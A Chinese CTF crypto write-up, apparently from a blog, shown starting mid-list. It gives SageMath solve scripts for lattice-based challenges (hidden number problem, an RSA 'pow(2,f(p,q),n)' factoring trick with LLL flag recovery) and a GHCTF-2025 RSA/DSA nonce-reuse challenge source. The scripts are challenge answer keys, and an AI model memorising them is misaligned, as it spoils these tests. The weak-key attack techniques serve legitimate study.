7839372385123283975949639433665292734490760458360682832497005213559939527031767909811695257768341209806346811519315554587887588294359891829457980910373676 , 9524560447616291402016995361580593070951296833074538783490159546001656765257005901587161833656370873513309819850104060230660386406669378214335512722509152 , 8734422874517209772760818316188000967216535009508164549745674472106165337990045713973843427581730460676070294620298664038968581128044873585552989614725336 , 5148158222052082942951739997892280954937954769195857112271289335776175568625514426629773392655353554820374445881301175856523121361252868192790918069469104 , 3405639365216597742633558534342314393231966921971024333387009357007031255109911181571542920889177048552084631482291912851876735480121959418518626599223928 , 6965895908963098896413697893751255263053889382630643791713636829201586125658579731479485123904224727756791164618191156426250811133029277086293720268527300 , 515472047175628755463279789359658211455570096067652817360508027869002916852457796014115363850477155232728049656195126940493402028508630979737222916876246 , 8377848726362282033165443045774756072489017398005262818165334796393061408947900148462399707261050565348807577258621241416711089587307194346694505937252864 , 1178755053483981880338850194698011124968424379914871101461970724324613752209283539401502897388962321646518511682063263530792638817282211333222820982688221 , 6409725586399153562174435158247599193499008381130383743433623949976530392240171542527657077771723107664747118903213393154893390715457247849808357209465942 , 3372824803484968486680937546271819996332625362891283809637871759604598252172343794474197823370030403360262989580844260103083478034905726890611202238641340 , 13221067729455004299677399984872603663881675510140157358091630484387026309376774076498558628883879446483977202290444900329681753187886973457338777404374837 , 7168388056726802823482632673894477305062116631923141017136239676696007696629606782541016490173953868270727600022309320772114799519383514048456314407549126 , 5250230933448962245502125593869313477032913928941516938273943408457441209365441112912617832856547549404891414953525445963675011329667621804152746371657313 , 8511291855606246692070730459514263912089592580342504124890734122750181111943376656479213361961009582891618556261302703133404839204999651359329176948170842 , 10576966024912004586600985705328475294820172279541596349092328002861342696932964481093301707680584309062968518297314914578723605267596141569538103299931592 , 12610576251820483830699440118009518195547953924641848179631259695652398482759919292823264035055444639679877606276670927735340951916197191958922906156370663 , 3742260845065949575192054445757226288737527960324254459850715703182879384214273141678432129201712761002566924178045796602250837169613100836509080462118064 , 11563799338655584285772430060426469486983276581413105960901201146319641194721216394735314795999096052047566733050321685673448559752053334666493545565267458 , 2135904971793751083168704063674429207856744601756475004904460101727999030934815461118290836502605293753384609825541213034656253854812143724421464450937515 , 3115138049292154301818359336614981367419382594686950083225042221335435796679806070685800479754927915293066789893346628151325862299622031407323031470432866 , 11834987428374239733081967249175125232293539826462896997963240557834259212701171232384194311849363016441847536816726226234955703291712817155658535826680986 ] iv = b'\x88\x0c\x7f\x92\xd7\xb7\xaf4\xe4\xfb\xd1_\xab\xff)\xb8'  ciphertext = b'\x94\x198\xd6\xa2mK\x00\x06\x7f\xad\xa0M\xf7\xadV;EO$\xee\xcdB0)\xfb!&8%,M'  rs = ts cs = gs G=GF(p) def  Babai_closest_vector (M, G, target ):  small = target   for  _ in  range (1 ):     for  i in  reversed (range (M.nrows())):       c = ((small * G[i]) / (G[i] * G[i])).round ()       small -= M[i] * c   return  target - small m = 30  n = 1  A = matrix(ZZ, m+n, m) for  i in  range (m):    A[i, i] = p for  x in  range (m):    A[m , x] = rs[x] lattice = IntegerLattice(A, lll_reduce=True )   gram = lattice.reduced_basis.gram_schmidt()[0 ] target = vector(ZZ, cs) res = Babai_closest_vector(lattice.reduced_basis, gram, target) R = IntegerModRing(p) M = Matrix(R, rs) res=vector(R, res) for  i,j in  zip (cs,res):    assert  len (bin (i-j))-2 ==400  key=((res[0 ])*inverse(rs[0 ],p)) %p cipher = AES.new(str (key).encode()[:16 ], AES.MODE_CBC,iv) flag = cipher.decrypt(ciphertex) print (flag)
奇怪的是,我HNP构造的格出不来,我感觉已经是配平了的
M = Matrix(ZZ,32 ,32 ) k = 2 ^(512 -400 ) for  i in  range (30 ):    L[i,i] = p * k     L[-2 ,i] = ts[i] * k     L[-1 ,i] = gs[i] * k L[-2 ,-2 ] = 1  L[-1 ,-1 ] = 2 ^512  res = L.LLL() for  i in  res:    if  i[-1 ] == 2 ^512 :         print (i[-2 ]) 
然后,翻了一下别的师傅的wp(在下面),发现,这里规约出来的都是p-key ???人傻了,这是什么原理?看了一下出题人自己的wp ,好像并没有这个问题
L = Matrix(QQ,32 ,32 ) k = 2 ^400  for  i in  range (30 ):    L[i,i] = p     L[-2 ,i] = ts[i]     L[-1 ,i] = gs[i] L[-2 ,-2 ] = k/p L[-1 ,-1 ] = k res = L.LLL() for  i in  res:    if  i[-1 ] == k:         key = p-(abs (i[-2 ].numerator())/k) 
from  Crypto.Util.number import  getPrime, bytes_to_longfrom  random import  *from  secret import  f, flagassert  len (flag) == 88 assert  flag.startswith(b'NSSCTF{' )assert  flag.endswith(b'}' )p = getPrime(512 ) q = getPrime(512 ) n = p*q P.<x,y> = ZZ[] f = P(str (f)) w = pow (2 ,f(p,q),n) assert  all (chr (i) in  '' .join(list (set (str (p)))) for  i in  flag[7 :-1 :])c = bytes_to_long(flag) % p print (f'{n = } \n' )print (f'{f = } \n' )print (f'{w = } \n' )print (f'{c = } \n' )''' n = 95656952327201449381426394713246214670537600365883923624876350719801926817916514429721785287844335184715049179879891389941974481490433975689601829920289485889138252888029716516069912637121531561601839948367426922036690701168975937162280451323099126372019216020898338909808577022618554997063496690156977790629 f = x^31 - x^30*y - 2*x^29*y^2 + 7*x^28*y^3 + 2*x^27*y^4 - 4*x^24*y^7 + 3*x^23*y^8 - x^20*y^11 - 4*x^19*y^12 + x^18*y^13 - 5*x^17*y^14 - 4*x^16*y^15 - x^15*y^16 + x^14*y^17 + x^13*y^18 + x^12*y^19 - 2*x^11*y^20 - 3*x^9*y^22 + 5*x^7*y^24 + x^6*y^25 + 6*x^4*y^27 + x^3*y^28 + 2*x*y^30 + y^31 - 2*x^30 - 3*x^29*y + 2*x^28*y^2 + 2*x^27*y^3 - x^26*y^4 - x^25*y^5 - 2*x^24*y^6 - 3*x^23*y^7 - 3*x^22*y^8 - 3*x^20*y^10 - 4*x^19*y^11 + 2*x^18*y^12 + x^15*y^15 - x^14*y^16 - 2*x^12*y^18 - 3*x^11*y^19 - x^10*y^20 + x^9*y^21 + 2*x^8*y^22 + x^7*y^23 + x^5*y^25 - x^4*y^26 - 2*x^3*y^27 - 2*x^2*y^28 - y^30 - 2*x^29 - x^28*y + 3*x^26*y^3 - x^25*y^4 - 2*x^24*y^5 + x^23*y^6 - x^22*y^7 - x^20*y^9 + 2*x^19*y^10 + 2*x^18*y^11 + x^16*y^13 + x^15*y^14 + x^14*y^15 + x^13*y^16 + x^12*y^17 + 5*x^11*y^18 - x^9*y^20 - 2*x^8*y^21 - 5*x^7*y^22 - 2*x^6*y^23 + 3*x^5*y^24 - 5*x^3*y^26 - x^2*y^27 + 2*x*y^28 - y^29 + 3*x^28 + 3*x^27*y - 2*x^26*y^2 + x^25*y^3 + 2*x^24*y^4 - x^23*y^5 - 2*x^22*y^6 - 3*x^20*y^8 - 3*x^19*y^9 + 4*x^17*y^11 - x^16*y^12 - 3*x^15*y^13 - 2*x^14*y^14 + x^13*y^15 + 2*x^12*y^16 - 2*x^11*y^17 + x^10*y^18 - 2*x^9*y^19 + x^8*y^20 - 2*x^7*y^21 - x^6*y^22 + x^5*y^23 - x^4*y^24 + x^3*y^25 + x^2*y^26 - x*y^27 - y^28 + x^27 + x^26*y - 2*x^24*y^3 + x^23*y^4 - 3*x^22*y^5 - 2*x^21*y^6 - 2*x^20*y^7 - 5*x^19*y^8 + 2*x^18*y^9 - 5*x^17*y^10 + x^16*y^11 - 3*x^15*y^12 - 4*x^14*y^13 - x^13*y^14 + x^12*y^15 + 3*x^11*y^16 + 2*x^10*y^17 - 4*x^9*y^18 - 2*x^6*y^21 + x^5*y^22 + 4*x^3*y^24 + 2*x^2*y^25 + 2*x*y^26 - 2*y^27 + x^25*y + x^24*y^2 + x^23*y^3 + 5*x^22*y^4 + x^20*y^6 - 3*x^19*y^7 + x^18*y^8 - x^17*y^9 + 2*x^15*y^11 - x^14*y^12 + 2*x^13*y^13 - x^12*y^14 + 4*x^11*y^15 - x^10*y^16 - 2*x^6*y^20 - x^5*y^21 + 3*x^3*y^23 + x^2*y^24 - 3*x*y^25 - 3*y^26 + 3*x^25 - 2*x^23*y^2 - x^21*y^4 + x^17*y^8 + 2*x^16*y^9 - x^15*y^10 - 2*x^14*y^11 - x^13*y^12 + 2*x^12*y^13 - 2*x^11*y^14 - x^9*y^16 - x^8*y^17 - x^6*y^19 - x^5*y^20 + x^4*y^21 + x^3*y^22 + 5*x*y^24 - 2*y^25 - x^24 + 2*x^23*y + x^22*y^2 - x^21*y^3 - x^19*y^5 + x^18*y^6 - x^17*y^7 + 2*x^16*y^8 - 4*x^15*y^9 - x^14*y^10 - x^13*y^11 - x^12*y^12 + 4*x^10*y^14 + 2*x^9*y^15 - x^8*y^16 - 2*x^7*y^17 - 2*x^6*y^18 + 4*x^5*y^19 + x^4*y^20 + 2*x^2*y^22 - 5*x*y^23 - y^24 + x^23 - x^22*y + 2*x^21*y^2 - x^20*y^3 - x^18*y^5 - x^17*y^6 - 5*x^15*y^8 + x^14*y^9 - 3*x^13*y^10 + 3*x^12*y^11 + 2*x^11*y^12 - 2*x^10*y^13 - 2*x^9*y^14 - x^8*y^15 + 2*x^7*y^16 - 2*x^6*y^17 - 4*x^5*y^18 - 5*x^3*y^20 - x^2*y^21 - x*y^22 - 4*y^23 - x^22 + 2*x^21*y - 2*x^20*y^2 - 2*x^19*y^3 - 3*x^17*y^5 - x^16*y^6 - x^15*y^7 + 4*x^13*y^9 + 2*x^12*y^10 + 3*x^11*y^11 + 2*x^10*y^12 - x^9*y^13 - x^7*y^15 + 2*x^6*y^16 + x^3*y^19 + 2*x^2*y^20 + 2*x*y^21 + 3*y^22 - 3*x^21 - x^20*y - x^19*y^2 + 2*x^17*y^4 - x^16*y^5 - x^15*y^6 + x^14*y^7 - 5*x^12*y^9 - 2*x^11*y^10 + x^10*y^11 + x^6*y^15 + x^5*y^16 + x^4*y^17 - 3*x^2*y^19 - 2*x*y^20 - 2*y^21 + x^20 + 2*x^19*y - 2*x^17*y^3 + 2*x^16*y^4 - 3*x^15*y^5 + 4*x^14*y^6 + 2*x^13*y^7 - x^12*y^8 - 2*x^11*y^9 + x^10*y^10 + 6*x^9*y^11 + x^8*y^12 + x^7*y^13 + 2*x^5*y^15 + 4*x^4*y^16 + x^3*y^17 - x^2*y^18 + 3*x*y^19 - x^17*y^2 + 2*x^16*y^3 + 3*x^14*y^5 - x^13*y^6 + 2*x^11*y^8 + x^10*y^9 + 3*x^9*y^10 - x^7*y^12 - x^6*y^13 + 3*x^5*y^14 - 4*x^4*y^15 + x^2*y^17 + 2*y^19 - x^18 - x^16*y^2 - 2*x^14*y^4 - 2*x^13*y^5 - 2*x^12*y^6 + 2*x^11*y^7 + 3*x^9*y^9 + 3*x^8*y^10 + x^6*y^12 - x^4*y^14 + 2*x^3*y^15 + 2*x^2*y^16 - 2*x*y^17 - x^17 - 4*x^16*y - 2*x^15*y^2 + 2*x^14*y^3 - x^13*y^4 + x^12*y^5 - 2*x^11*y^6 - 3*x^10*y^7 - x^9*y^8 - 5*x^8*y^9 + 2*x^7*y^10 + 2*x^6*y^11 - x^5*y^12 + x^4*y^13 - 3*x^2*y^15 + x*y^16 - 3*x^16 + x^15*y - 3*x^14*y^2 - x^13*y^3 - x^12*y^4 + 2*x^11*y^5 - x^10*y^6 + 5*x^8*y^8 + 3*x^7*y^9 + 3*x^6*y^10 + 2*x^5*y^11 + 4*x^4*y^12 + 2*x^3*y^13 + x^2*y^14 - 3*x*y^15 - x^15 + 3*x^14*y + x^13*y^2 - x^12*y^3 - 3*x^11*y^4 + x^10*y^5 - x^9*y^6 + 2*x^8*y^7 - x^7*y^8 + 4*x^5*y^10 - 2*x^4*y^11 + x^3*y^12 - x^14 + x^13*y + 2*x^12*y^2 + x^11*y^3 - 5*x^10*y^4 - x^9*y^5 - 3*x^8*y^6 - 2*x^7*y^7 + x^6*y^8 + 3*x^5*y^9 + x^4*y^10 + 2*x^3*y^11 - x^2*y^12 - 4*x*y^13 + 3*y^14 + x^12*y - 2*x^11*y^2 - x^9*y^4 - x^8*y^5 + 5*x^7*y^6 - 4*x^6*y^7 + 3*x^5*y^8 + 4*x^4*y^9 - 3*x^3*y^10 - x^2*y^11 - 2*x*y^12 - 3*y^13 + 3*x^12 + x^11*y + x^10*y^2 + x^9*y^3 + x^8*y^4 - x^6*y^6 - x^5*y^7 - 4*x^3*y^9 - x^2*y^10 - 3*x*y^11 - 2*y^12 + x^10*y + 5*x^9*y^2 + x^8*y^3 + 3*x^5*y^6 + x^4*y^7 + 2*x^3*y^8 - 4*x^2*y^9 + 2*x*y^10 + 3*y^11 - x^10 - 2*x^9*y - 2*x^7*y^3 - x^6*y^4 + x^5*y^5 + 3*x^4*y^6 - 2*x^2*y^8 - x*y^9 + 4*x^9 - 3*x^8*y - 3*x^6*y^3 + x^5*y^4 - x^4*y^5 - 2*x^3*y^6 - 2*x^2*y^7 + x*y^8 + 4*y^9 + 2*x^8 - x^7*y - 2*x^5*y^3 - 4*x^4*y^4 + 3*x^3*y^5 + 4*x^2*y^6 + 2*x*y^7 - 2*y^8 + 2*x^7 + 3*x^5*y^2 + 3*x^2*y^5 - x*y^6 - 4*x^6 + 6*x^3*y^3 + 2*x^2*y^4 - 2*x*y^5 - 3*y^6 + x^5 - 3*x^4*y + x^3*y^2 + x^2*y^3 - 2*x*y^4 + 2*x^4 - 2*x^3*y + 6*x^2*y^2 - 3*x*y^3 - 2*y^4 - 5*x^3 - 2*x^2*y - 2*x*y^2 + 3*y^3 + 2*x^2 - x*y + y^2 - 2*x + 2*y - 2 w = 12796020294902567574981427270787776254781813995526831579805652479456168245098217943847166109912113827479436654134179666391771173421469188197935460525521295192736123648410762964187396897298542198935971755852754544978564521188423737649175136194386664628304164316905741781089536713701674793641345344818309314224 c = 10266913434526071998707605266130137733134248608585146234981245806763995653822203763396430876254213500327272952979577138542487120755771047170064775346450942 ''' 
emmm,怎么说呢,去github 搜了一下pow(2,f(p,q),n) ,真给我找到了(注意看,五天前)GCD求出p 是一样的,求flag还得自己想办法ictf月赛(应该是月赛吧)的wp,具体原理还没研究
(突然间有一个想法,让小凳刷刷这里月赛的题,虽然wp给的是exp,应该能学到点东西的吧?好像国内就没有这种形式的比赛,不像cf那样)
https://imaginaryctf.org/ArchivedChallenges Archived Challenges - February 2025 - Crypto - bivariate (110pts) - 10/02 
有意思的是,这题的前一题也是弱化版,跟上面的EZ_Fermat 一样
小改一下参数,求出p之后卡了好久,80位的数字也太长了,并没有可行的思路,网上直接找,也找不到有用的参考
然后到了晚上就想起了羊城杯2024 的一道题目rsa-loss ,只能说比较类似,改了一下发现还是跑不出结果,因为脚本其实还是bcactf-4.0原题rsa_is_broken 的脚本
半个多小时后,我又有想法了,会不会还有别的解题思路,一搜羊城杯2024rsa-loss ,跳出一篇csdn的博客,https://blog.csdn.net/XiongSiqi_blog/article/details/141638136 
发现这位师傅套用的还是糖醋小鸡块师傅的脚本,再次跳转 
专研一下师傅的思路,发现还是构造格,我之前也有构造格的想法(主要原因是我们已知flag的长度 ,而且可以从字节串转换为整型 入手,  s u m ( a i ∗ 25 5 i ) 罢了 \ sum(a_{i}*255^{i})罢了   s u m ( a i  ∗ 2 5 5 i ) 罢 了 ASCII为48到57 ,跟后面的1,0组成
所以得优化一下,弄成t i = a i − 48 t_{i}=a_{i}-48 t i  = a i  − 4 8 t i t_{i} t i  c也要进行处理
因为我们的a i ∈ [ 0 , 9 ] a_{i}\in [0,9] a i  ∈ [ 0 , 9 ] 使目标向量中值的数量级更加接近 
然后,我就用LLL算法 进行格规约 了,可以看到小鸡块师傅 用的是BKZ算法 (规约能力更强 ),并且给格的最后一列 配上了个大系数 (至于多大,一般得自行测试调整)使得能规约出目标向量中的0,我一开始没用到,结果就是一位之差,最后还是加上了优化处理 还是非常必要的
from  Crypto.Util.number import  *P.<x,y> = ZZ[] n = 95656952327201449381426394713246214670537600365883923624876350719801926817916514429721785287844335184715049179879891389941974481490433975689601829920289485889138252888029716516069912637121531561601839948367426922036690701168975937162280451323099126372019216020898338909808577022618554997063496690156977790629  f = x^31  - x^30 *y - 2 *x^29 *y^2  + 7 *x^28 *y^3  + 2 *x^27 *y^4  - 4 *x^24 *y^7  + 3 *x^23 *y^8  - x^20 *y^11  - 4 *x^19 *y^12  + x^18 *y^13  - 5 *x^17 *y^14  - 4 *x^16 *y^15  - x^15 *y^16  + x^14 *y^17  + x^13 *y^18  + x^12 *y^19  - 2 *x^11 *y^20  - 3 *x^9 *y^22  + 5 *x^7 *y^24  + x^6 *y^25  + 6 *x^4 *y^27  + x^3 *y^28  + 2 *x*y^30  + y^31  - 2 *x^30  - 3 *x^29 *y + 2 *x^28 *y^2  + 2 *x^27 *y^3  - x^26 *y^4  - x^25 *y^5  - 2 *x^24 *y^6  - 3 *x^23 *y^7  - 3 *x^22 *y^8  - 3 *x^20 *y^10  - 4 *x^19 *y^11  + 2 *x^18 *y^12  + x^15 *y^15  - x^14 *y^16  - 2 *x^12 *y^18  - 3 *x^11 *y^19  - x^10 *y^20  + x^9 *y^21  + 2 *x^8 *y^22  + x^7 *y^23  + x^5 *y^25  - x^4 *y^26  - 2 *x^3 *y^27  - 2 *x^2 *y^28  - y^30  - 2 *x^29  - x^28 *y + 3 *x^26 *y^3  - x^25 *y^4  - 2 *x^24 *y^5  + x^23 *y^6  - x^22 *y^7  - x^20 *y^9  + 2 *x^19 *y^10  + 2 *x^18 *y^11  + x^16 *y^13  + x^15 *y^14  + x^14 *y^15  + x^13 *y^16  + x^12 *y^17  + 5 *x^11 *y^18  - x^9 *y^20  - 2 *x^8 *y^21  - 5 *x^7 *y^22  - 2 *x^6 *y^23  + 3 *x^5 *y^24  - 5 *x^3 *y^26  - x^2 *y^27  + 2 *x*y^28  - y^29  + 3 *x^28  + 3 *x^27 *y - 2 *x^26 *y^2  + x^25 *y^3  + 2 *x^24 *y^4  - x^23 *y^5  - 2 *x^22 *y^6  - 3 *x^20 *y^8  - 3 *x^19 *y^9  + 4 *x^17 *y^11  - x^16 *y^12  - 3 *x^15 *y^13  - 2 *x^14 *y^14  + x^13 *y^15  + 2 *x^12 *y^16  - 2 *x^11 *y^17  + x^10 *y^18  - 2 *x^9 *y^19  + x^8 *y^20  - 2 *x^7 *y^21  - x^6 *y^22  + x^5 *y^23  - x^4 *y^24  + x^3 *y^25  + x^2 *y^26  - x*y^27  - y^28  + x^27  + x^26 *y - 2 *x^24 *y^3  + x^23 *y^4  - 3 *x^22 *y^5  - 2 *x^21 *y^6  - 2 *x^20 *y^7  - 5 *x^19 *y^8  + 2 *x^18 *y^9  - 5 *x^17 *y^10  + x^16 *y^11  - 3 *x^15 *y^12  - 4 *x^14 *y^13  - x^13 *y^14  + x^12 *y^15  + 3 *x^11 *y^16  + 2 *x^10 *y^17  - 4 *x^9 *y^18  - 2 *x^6 *y^21  + x^5 *y^22  + 4 *x^3 *y^24  + 2 *x^2 *y^25  + 2 *x*y^26  - 2 *y^27  + x^25 *y + x^24 *y^2  + x^23 *y^3  + 5 *x^22 *y^4  + x^20 *y^6  - 3 *x^19 *y^7  + x^18 *y^8  - x^17 *y^9  + 2 *x^15 *y^11  - x^14 *y^12  + 2 *x^13 *y^13  - x^12 *y^14  + 4 *x^11 *y^15  - x^10 *y^16  - 2 *x^6 *y^20  - x^5 *y^21  + 3 *x^3 *y^23  + x^2 *y^24  - 3 *x*y^25  - 3 *y^26  + 3 *x^25  - 2 *x^23 *y^2  - x^21 *y^4  + x^17 *y^8  + 2 *x^16 *y^9  - x^15 *y^10  - 2 *x^14 *y^11  - x^13 *y^12  + 2 *x^12 *y^13  - 2 *x^11 *y^14  - x^9 *y^16  - x^8 *y^17  - x^6 *y^19  - x^5 *y^20  + x^4 *y^21  + x^3 *y^22  + 5 *x*y^24  - 2 *y^25  - x^24  + 2 *x^23 *y + x^22 *y^2  - x^21 *y^3  - x^19 *y^5  + x^18 *y^6  - x^17 *y^7  + 2 *x^16 *y^8  - 4 *x^15 *y^9  - x^14 *y^10  - x^13 *y^11  - x^12 *y^12  + 4 *x^10 *y^14  + 2 *x^9 *y^15  - x^8 *y^16  - 2 *x^7 *y^17  - 2 *x^6 *y^18  + 4 *x^5 *y^19  + x^4 *y^20  + 2 *x^2 *y^22  - 5 *x*y^23  - y^24  + x^23  - x^22 *y + 2 *x^21 *y^2  - x^20 *y^3  - x^18 *y^5  - x^17 *y^6  - 5 *x^15 *y^8  + x^14 *y^9  - 3 *x^13 *y^10  + 3 *x^12 *y^11  + 2 *x^11 *y^12  - 2 *x^10 *y^13  - 2 *x^9 *y^14  - x^8 *y^15  + 2 *x^7 *y^16  - 2 *x^6 *y^17  - 4 *x^5 *y^18  - 5 *x^3 *y^20  - x^2 *y^21  - x*y^22  - 4 *y^23  - x^22  + 2 *x^21 *y - 2 *x^20 *y^2  - 2 *x^19 *y^3  - 3 *x^17 *y^5  - x^16 *y^6  - x^15 *y^7  + 4 *x^13 *y^9  + 2 *x^12 *y^10  + 3 *x^11 *y^11  + 2 *x^10 *y^12  - x^9 *y^13  - x^7 *y^15  + 2 *x^6 *y^16  + x^3 *y^19  + 2 *x^2 *y^20  + 2 *x*y^21  + 3 *y^22  - 3 *x^21  - x^20 *y - x^19 *y^2  + 2 *x^17 *y^4  - x^16 *y^5  - x^15 *y^6  + x^14 *y^7  - 5 *x^12 *y^9  - 2 *x^11 *y^10  + x^10 *y^11  + x^6 *y^15  + x^5 *y^16  + x^4 *y^17  - 3 *x^2 *y^19  - 2 *x*y^20  - 2 *y^21  + x^20  + 2 *x^19 *y - 2 *x^17 *y^3  + 2 *x^16 *y^4  - 3 *x^15 *y^5  + 4 *x^14 *y^6  + 2 *x^13 *y^7  - x^12 *y^8  - 2 *x^11 *y^9  + x^10 *y^10  + 6 *x^9 *y^11  + x^8 *y^12  + x^7 *y^13  + 2 *x^5 *y^15  + 4 *x^4 *y^16  + x^3 *y^17  - x^2 *y^18  + 3 *x*y^19  - x^17 *y^2  + 2 *x^16 *y^3  + 3 *x^14 *y^5  - x^13 *y^6  + 2 *x^11 *y^8  + x^10 *y^9  + 3 *x^9 *y^10  - x^7 *y^12  - x^6 *y^13  + 3 *x^5 *y^14  - 4 *x^4 *y^15  + x^2 *y^17  + 2 *y^19  - x^18  - x^16 *y^2  - 2 *x^14 *y^4  - 2 *x^13 *y^5  - 2 *x^12 *y^6  + 2 *x^11 *y^7  + 3 *x^9 *y^9  + 3 *x^8 *y^10  + x^6 *y^12  - x^4 *y^14  + 2 *x^3 *y^15  + 2 *x^2 *y^16  - 2 *x*y^17  - x^17  - 4 *x^16 *y - 2 *x^15 *y^2  + 2 *x^14 *y^3  - x^13 *y^4  + x^12 *y^5  - 2 *x^11 *y^6  - 3 *x^10 *y^7  - x^9 *y^8  - 5 *x^8 *y^9  + 2 *x^7 *y^10  + 2 *x^6 *y^11  - x^5 *y^12  + x^4 *y^13  - 3 *x^2 *y^15  + x*y^16  - 3 *x^16  + x^15 *y - 3 *x^14 *y^2  - x^13 *y^3  - x^12 *y^4  + 2 *x^11 *y^5  - x^10 *y^6  + 5 *x^8 *y^8  + 3 *x^7 *y^9  + 3 *x^6 *y^10  + 2 *x^5 *y^11  + 4 *x^4 *y^12  + 2 *x^3 *y^13  + x^2 *y^14  - 3 *x*y^15  - x^15  + 3 *x^14 *y + x^13 *y^2  - x^12 *y^3  - 3 *x^11 *y^4  + x^10 *y^5  - x^9 *y^6  + 2 *x^8 *y^7  - x^7 *y^8  + 4 *x^5 *y^10  - 2 *x^4 *y^11  + x^3 *y^12  - x^14  + x^13 *y + 2 *x^12 *y^2  + x^11 *y^3  - 5 *x^10 *y^4  - x^9 *y^5  - 3 *x^8 *y^6  - 2 *x^7 *y^7  + x^6 *y^8  + 3 *x^5 *y^9  + x^4 *y^10  + 2 *x^3 *y^11  - x^2 *y^12  - 4 *x*y^13  + 3 *y^14  + x^12 *y - 2 *x^11 *y^2  - x^9 *y^4  - x^8 *y^5  + 5 *x^7 *y^6  - 4 *x^6 *y^7  + 3 *x^5 *y^8  + 4 *x^4 *y^9  - 3 *x^3 *y^10  - x^2 *y^11  - 2 *x*y^12  - 3 *y^13  + 3 *x^12  + x^11 *y + x^10 *y^2  + x^9 *y^3  + x^8 *y^4  - x^6 *y^6  - x^5 *y^7  - 4 *x^3 *y^9  - x^2 *y^10  - 3 *x*y^11  - 2 *y^12  + x^10 *y + 5 *x^9 *y^2  + x^8 *y^3  + 3 *x^5 *y^6  + x^4 *y^7  + 2 *x^3 *y^8  - 4 *x^2 *y^9  + 2 *x*y^10  + 3 *y^11  - x^10  - 2 *x^9 *y - 2 *x^7 *y^3  - x^6 *y^4  + x^5 *y^5  + 3 *x^4 *y^6  - 2 *x^2 *y^8  - x*y^9  + 4 *x^9  - 3 *x^8 *y - 3 *x^6 *y^3  + x^5 *y^4  - x^4 *y^5  - 2 *x^3 *y^6  - 2 *x^2 *y^7  + x*y^8  + 4 *y^9  + 2 *x^8  - x^7 *y - 2 *x^5 *y^3  - 4 *x^4 *y^4  + 3 *x^3 *y^5  + 4 *x^2 *y^6  + 2 *x*y^7  - 2 *y^8  + 2 *x^7  + 3 *x^5 *y^2  + 3 *x^2 *y^5  - x*y^6  - 4 *x^6  + 6 *x^3 *y^3  + 2 *x^2 *y^4  - 2 *x*y^5  - 3 *y^6  + x^5  - 3 *x^4 *y + x^3 *y^2  + x^2 *y^3  - 2 *x*y^4  + 2 *x^4  - 2 *x^3 *y + 6 *x^2 *y^2  - 3 *x*y^3  - 2 *y^4  - 5 *x^3  - 2 *x^2 *y - 2 *x*y^2  + 3 *y^3  + 2 *x^2  - x*y + y^2  - 2 *x + 2 *y - 2  w = 12796020294902567574981427270787776254781813995526831579805652479456168245098217943847166109912113827479436654134179666391771173421469188197935460525521295192736123648410762964187396897298542198935971755852754544978564521188423737649175136194386664628304164316905741781089536713701674793641345344818309314224  c = 10266913434526071998707605266130137733134248608585146234981245806763995653822203763396430876254213500327272952979577138542487120755771047170064775346450942  need = [(-term[0 ], term[1 ].degree()) for  term in  f%(x-1 )] sumpow = [4 ]  sumpow.append(pow (2 ,n+1 ,n))  for  i in  range (2 ,32 ):    sumpow.append(pow (sumpow[i-1 ],n+1 ,n) * pow (sumpow[i-2 ],-n,n))     sumpow[-1 ] %= n      f2 = f w2 = w for  coeff, deg in  need:    w2 *= pow (sumpow[deg],coeff,n)     w2 %= n     f2 += coeff*(x**deg + y**deg) p = gcd(pow (2 ,int (f2%(x-1 )),n) * pow (w2,-1 ,n) - 1 , n) prefix = b"NSSCTF{"  suffix = b"}"  length = 88  - len (prefix) - len (suffix) c -= 256 ^(len (suffix) + length) * bytes_to_long(prefix) c -= bytes_to_long(suffix) c = c * inverse(256 ,p) % p L = Matrix(ZZ,length+2 ,length+2 ) for  i in  range (length):    L[i,i] = 1      L[i,-1 ] = 256 ^i     c -= 256 ^i*48  L[-2 ,-2 ] = 4  L[-2 ,-1 ] = -c L[-1 ,-1 ] = p L[:,-1 :] *= 2 ^512  res = L.LLL() flag = ""  for  i in  res:    if (abs (i[-2 ]) == 4  and  all (abs (j) < 10  for  j in  i)):         for  j in  i[:-2 ][::-1 ]:             flag += chr (48  + abs (j)) flag = prefix+flag.encode()+suffix print (flag.decode())
from  random import  getrandbits, randintfrom  secrets import  randbelowfrom  Crypto.Util.number import *from  Crypto.Util.Padding import  padfrom  Crypto.Cipher import  AESimport  hashlibimport  randomimport  gmpy2ink=getPrime(20 ) p1= getPrime(512 ) q1= getPrime(512 ) N = p1* q1 phi = (p1-1 ) * (q1-1 ) while  True :    d1= getRandomNBitInteger(200 )     if  GCD(d1, phi) == 1 :         e = inverse(d1, phi)         break  c_ink = pow (ink, e, N) print (f'c_ink=' ,c_ink)print (f'e=' ,e)print (f'N=' ,N)k= getPrime(64 ) q = getPrime(160 ) def  sign (msg, pub, pri, k ):    (p,q,g,y) = pub     x = pri     r = int (pow (g, k, p) % q)     h = int (hashlib.sha256(msg).digest().hex (),16 )     s = int ((h + x * r) * gmpy2.invert(k, q) % q)     return  (r, s) while  True :    temp = q * getrandbits(864 )     if  isPrime(temp + 1 ):         p = temp + 1          break  assert  p % q == 1 h = randint(1 , p - 1 ) g = pow (h, (p - 1 ) // q, p) y = pow (g, k, p) pub = (p,q,g,y) pri = random.randint(1 , q-1 ) print (f"(r1,s1)=" ,sign(b'GHCTF-2025' , pub, pri, k))print (f"(r2,s2)=" ,sign(b'GHCTF-2025' , pub, pri, k+ink))print (f"{g= } " )print (f"{q= } " )print (f"{p= } " )print (f"{y= } " )key = hashlib.sha1(str (pri).encode()).digest()[:16 ] cipher = AES.new(key, AES.MODE_ECB) flag="NSSCTF{xxxxxxxx}"  ciphertext = cipher.encrypt(pad(flag.encode(), 16 )) print (f"{ciphertext = } " )''' c_ink= 75517502692097831363443739147565176367247985201143975453326891807623085586665800338505194812511215986799510259417486636115714543892322380908775898968005967267154089356401466517827082639942650711458196552847137272733225451581167527549711435805194039361007506436462393605949663173972848316802086005675594122447 e= 97127528017076464922170978933159739328499830874876612140194720448608536284451056980759925228574802703400503852897647806707933102198339936307176078592550748707182506634151382952065240918923594664309561466538540752851827183955776181255541306419282376724578231110985180090748520497985751591062886932254909959583 N= 131342286566556880877092331187418465653855813425966929864425381510875531237549624989644814104311810243468058174748867544024292263674725375273146689145421426693384862215460097683187892351130513429928063652701077721570140977719823754701988835199434602294597102748436781125528389125846980183998136743830655746063 (r1,s1)= (116607429176396769010327954525649019081679807573, 242024511677350537268048640408155954695100314686) (r2,s2)= (282969697665204582571637561594660002955972273916, 233488943967710383661411268886726155900968304282) g= 